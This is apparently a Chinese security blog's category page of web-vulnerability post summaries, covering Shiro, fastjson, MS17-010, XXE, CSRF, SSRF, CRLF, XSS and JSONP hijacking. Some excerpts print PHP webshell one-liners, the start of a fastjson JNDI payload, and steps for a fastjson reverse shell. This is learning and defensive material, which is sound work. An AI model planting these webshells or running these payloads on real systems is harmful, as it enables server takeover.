随笔分类 -  WEB漏洞

mysql添加远程连接权限
摘要:查看登录用户 mysql> select host,user,password from user; 想用本地IP登录,那么可以将以上的Host值改为自己的Ip即可。 这里有多个root,对应着不同场景。(后期研究为什么mysql表有多个root) 给远程连接授权 mysql> use mysql; 阅读全文
posted @ 2020-05-10 23:04 Mysticbinary 阅读(341) 评论(0) 推荐(0) 编辑
Shiro反序列化漏洞检测、dnslog
摘要:# Characteristic If `RememberMe=deleteMe ` at Cookie, So It is Shiro. ![](https://img2020.cnblogs.com/blog/1552062/202005/1552062-20200505145749999-13 阅读全文
posted @ 2020-05-05 16:10 Mysticbinary 阅读(1375) 评论(0) 推荐(0) 编辑
fastjson 反弹shell
摘要:如下文章说得很不详细,只是用于记录我的步骤,初次利用的人,建议找别的博客文章学习。 准备一台公网服务器 cd test python -m SimpleHTTPServer 8888 javac Exploit.java 里面的ip和端口改成你的 import javax.naming.Contex 阅读全文
posted @ 2020-04-27 17:06 Mysticbinary 阅读(3484) 评论(0) 推荐(1) 编辑
永恒之蓝(MS17-010)检测与利用
摘要:利用Nmap检测 命令: nmap -p445 --script smb-vuln-ms17-010 [IP] # 如果运行报错,可以加个sudo IP/24 = 8位地址范围,对应的子网掩码简单理解: ip/24 11111111 11111111 11111111 00000000 2^8=25 阅读全文
posted @ 2020-04-24 14:10 Mysticbinary 阅读(2916) 评论(0) 推荐(0) 编辑
WEB容器开启、关闭OPTIONS方法
摘要:目录发现关闭options方案 发现 请求包随意,响应包信息如下: HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsof 阅读全文
posted @ 2020-04-17 11:50 Mysticbinary 阅读(3643) 评论(0) 推荐(1) 编辑
fastjson 请求dnslog
摘要:Fastjson ⇐ 1.2.47 远程命令执行漏洞利用工具及方法记录 payload rmi://、ldap:// 可以切换尝试。 param={ "@type": "java.lang.Class", br / > "a": { "@type": "java.lang.Class", "val" 阅读全文
posted @ 2020-04-15 15:01 Mysticbinary 阅读(2335) 评论(0) 推荐(1) 编辑
springboot actuator 配置安全
摘要:springboot actuator监控是什么?类似php的phpinfor()函数,不过actuator更强大,可以查看的数据、状态更多。Actuator是Spring Boot提供的对应用系统的监控和管理的集成功能,可以查看应用配置的详细信息,例如自动化配置信息、创建的Spring beans 阅读全文
posted @ 2020-04-13 10:21 Mysticbinary 阅读(4677) 评论(0) 推荐(0) 编辑
XXE漏洞原理、检测与修复
摘要:What is XXE? XML external entity injection (also known as XXE)。奇怪,XML External Entity 为什么不叫XEE? XML 外部实体注入(也称为 XXE)是一种 Web 安全漏洞,允许攻击者干扰应用程序对 XML 数据的处理 阅读全文
posted @ 2020-04-09 18:00 Mysticbinary 阅读(14269) 评论(0) 推荐(0) 编辑
CSRF的几种防御方法的利弊分析
摘要:本文直接从防御方式开始讨论,防御CSRF有4种方法: 使用POST替代GET 检验HTTP Referer 验证码 Token 使用POST替代GET 一些程序员在开发的时候都是用GET、POST通用的函数来接收客户端的数据,这样也是某些接口有CSRF的原因之一,但是将全部接口都改成只允许POST方 阅读全文
posted @ 2020-04-04 00:27 Mysticbinary 阅读(1852) 评论(4) 推荐(2) 编辑
同源策略与JSONP劫持原理
摘要:同源策略 浏览器中有两个安全机制,一个浏览器沙盒(Sandbox),另一个就是同源策略(Same Origin Policy,简称SOP) ,下面介绍同源策略。同源是指同协议、同域名、同端口,必须三同,缺一不可。下面列举了一些例子,为方便读者了解哪些是属于同源,下面列举一些案例: 根据这个策略,a. 阅读全文
posted @ 2020-04-02 22:08 Mysticbinary 阅读(1267) 评论(0) 推荐(3) 编辑
Mybatis检查SQL注入
摘要:Mybatis 的 Mapper.xml 语句中 parameterType 向SQL语句传参有两种方式:#{ } 和 ${ }。 使用#{ }是来防止SQL注入,使用${ }是用来动态拼接参数。 如何排查出 1. 检查是否有$号 如果你使用的是ide代码编辑器,那么可以通过全局搜索${ , 快速定 阅读全文
posted @ 2020-04-01 16:03 Mysticbinary 阅读(2118) 评论(0) 推荐(0) 编辑
SSRF攻击原理
摘要:什么是SSRF 一个对外的Web接口,改接口能让用户控制curl命令,去访问别的web服务。 简图如下 想象一下当用户请求的baidu.com/x.php?image=google.com/1.jpg 改成 baidu.com/x.php?image=private.com/php.info,是不是 阅读全文
posted @ 2020-03-26 22:51 Mysticbinary 阅读(721) 评论(0) 推荐(0) 编辑
MySQL注入 前端int型参数插入SQL语句
摘要:类似PHP语言的 mysql_real_escape_string() 的函数,在用来防范SQL注入的时候,可能会遇到int型注入成功的情况。 mysql_real_escape_string()用法 mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊 阅读全文
posted @ 2020-03-26 22:46 Mysticbinary 阅读(978) 评论(0) 推荐(0) 编辑
PHP Webshell List
摘要:基础类 很容易被扫描、检测出来 <?php @eval($_GET['phpcode']);?> <?php @eval($_POST['phpcode']);?> <?php @system($_GET['cmd']);?> <?php @system($_POST['cmd']);?> <?ph 阅读全文
posted @ 2020-03-26 22:41 Mysticbinary 阅读(418) 评论(0) 推荐(0) 编辑
CRLF注入原理
摘要:CRLF 指的是回车符(CR,ASCII 13,\r,%0d) 和换行符(LF,ASCII 10,\n,%0a),操作系统就是根据这个标识来进行换行的,你在键盘输入回车键就是输出这个字符,只不过win和linux系统采用的标识不一样而已。 在HTTP当中HTTP的Header和Body之间就是用两个 阅读全文
posted @ 2020-03-24 17:02 Mysticbinary 阅读(9159) 评论(2) 推荐(0) 编辑
DOM-XSS攻击原理与防御
摘要:目录XSSDOM文档利用原理DOM-XSS 场景一:innerHTMLDOM-XSS 场景二:跳转DOM-XSS 场景三:evalDOM-XSS 场景四:cookie、referrerDOM-XSS 场景五:document.write 、document.URL.indexOf("id=")防护策 阅读全文
posted @ 2020-03-22 18:53 Mysticbinary 阅读(31173) 评论(3) 推荐(6) 编辑
CSRF绕过后端Referer校验
摘要:CSRF绕过后端Referer校验分正常情况和不正常的情况,我们这里主要讨论开发在写校验referer程序时,不正常的情况下怎么进行绕过。 正常情况 正常的情况指服务器端校验Referer的代码没毛病,那么意味着前端是无法绕过的。 我之前考虑过的方案: JS修改Referer,失败; 让用户点击第三 阅读全文
posted @ 2020-01-07 14:53 Mysticbinary 阅读(2455) 评论(0) 推荐(0) 编辑
XSS Payload List
摘要:标签、事件、属性 xss的攻击原理就是前端被插入了恶意的js代码,下面展示大部分可以执行js的标签、事件、属性; 标签(label) <script> <a> <p> <img> <body> <button> <var> <div> <style> <iframe> <object> <input 阅读全文
posted @ 2020-01-06 21:55 Mysticbinary 阅读(2649) 评论(0) 推荐(0) 编辑
JSONP Hijackin攻击流程
摘要:如下文章是早期编写,有一些错误,建议读新写的文章:https://www.cnblogs.com/mysticbinary/p/12620152.html JSONP Hijackin的中文意思是JSON劫持,而能产生JSON数据劫持的原因在于前端被跨站攻击了。跨站=跨域,跨域从字面上理解的话,就是 阅读全文
posted @ 2020-01-06 16:27 Mysticbinary 阅读(1033) 评论(0) 推荐(1) 编辑